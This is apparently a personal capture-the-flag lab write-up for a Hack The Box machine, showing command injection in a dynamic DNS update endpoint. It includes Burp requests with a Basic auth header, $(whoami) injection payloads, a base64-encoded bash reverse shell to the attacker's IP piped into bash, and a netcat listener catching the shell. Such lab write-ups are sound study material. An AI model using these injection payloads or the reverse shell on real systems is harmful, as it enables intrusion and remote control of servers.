4 nsupdate exploit

Trying to find exploit for ISC BIND 9.16.1
# nothing

Looking nochg we find
https://help.dyn.com/remote-access-api/return-codes/
https://www.noip.com/integrate/response
nochg IP_ADDRESS => Success	IP address is current, no update performed. Followed by a space and the IP address that it is currently set to. The IP address returned will be the IPv4 address if an IPv4 is supplied. If IPv4 and IPv6 are both supplied, both ips will be returned in a comma separated list. If only an IPv6 address is supplied, an IPv6 address (only) will be returned.

# more information on /update
https://www.noip.com/integrate/request

# using Burp to intercept and change request

Changing GET request to
GET /nic/update?hostname=kashz.dyna.htb&myip=10.10.16.161 HTTP/1.1
badauth

# we need to provide credentails
# basic auth is needed using Authorization header
# new request

Got several 408 Request Timeout Errors
debugged: for some reason, burp needs to have two empty lines at the end of sent request else ERROR

# retrying ...
GET /nic/update?hostname=kashz.dyna.htb&myip=10.10.16.161 HTTP/1.1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
# response
911 [wrngdom: dyna.htb]

# meaning wrong domain, trying a different domain no-ip.htb
GET /nic/update?hostname=kashz.no-ip.htb&myip=10.10.16.161 HTTP/1.1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
# response
good 10.10.16.161

# trying out code injection
GET /nic/update?hostname=id;kashz.no-ip.htb&myip=10.10.16.161 HTTP/1.1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
# response
911 [nsupdate failed]


# spent a lot of time trying to understand if any exploit
# came across "nsupdate remote format string exploit" https://www.exploit-db.com/exploits/21440

GET /nic/update?hostname="$(whoami).no-ip.htb&myip=10.10.16.161 
# response
server 127.0.0.1
zone no-ip.htb
update delete www-data.no-ip.htb
good 10.10.16.161

# trying out "$(whoami;id;hostname)"
update delete www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) dynstr.dyna.htb.no-ip.htb

# trying out bash shell gives ERROR 400
# maybe base64 it?

# as we are using + to concatenate the string
# we need to find a base64 value without it, using normal ports 6969, 1337 etc has + in them so trying out a different port 999

$ echo -n "/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.161/999 0>&1'" | base64
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE2MS85OTkgMD4mMSc=

# shell success with
GET /nic/update?hostname=";echo+L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE2MS85OTkgMD4mMSc=+|+base64+-d+|+bash;kashz.no-ip.htb&myip=10.10.16.161 HTTP/1.1

$ nc -lvnp 999
listening on [any] 999 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.244] 51780
bash: cannot set terminal process group (795): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dynstr:/var/www/html/nic$ whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Last updated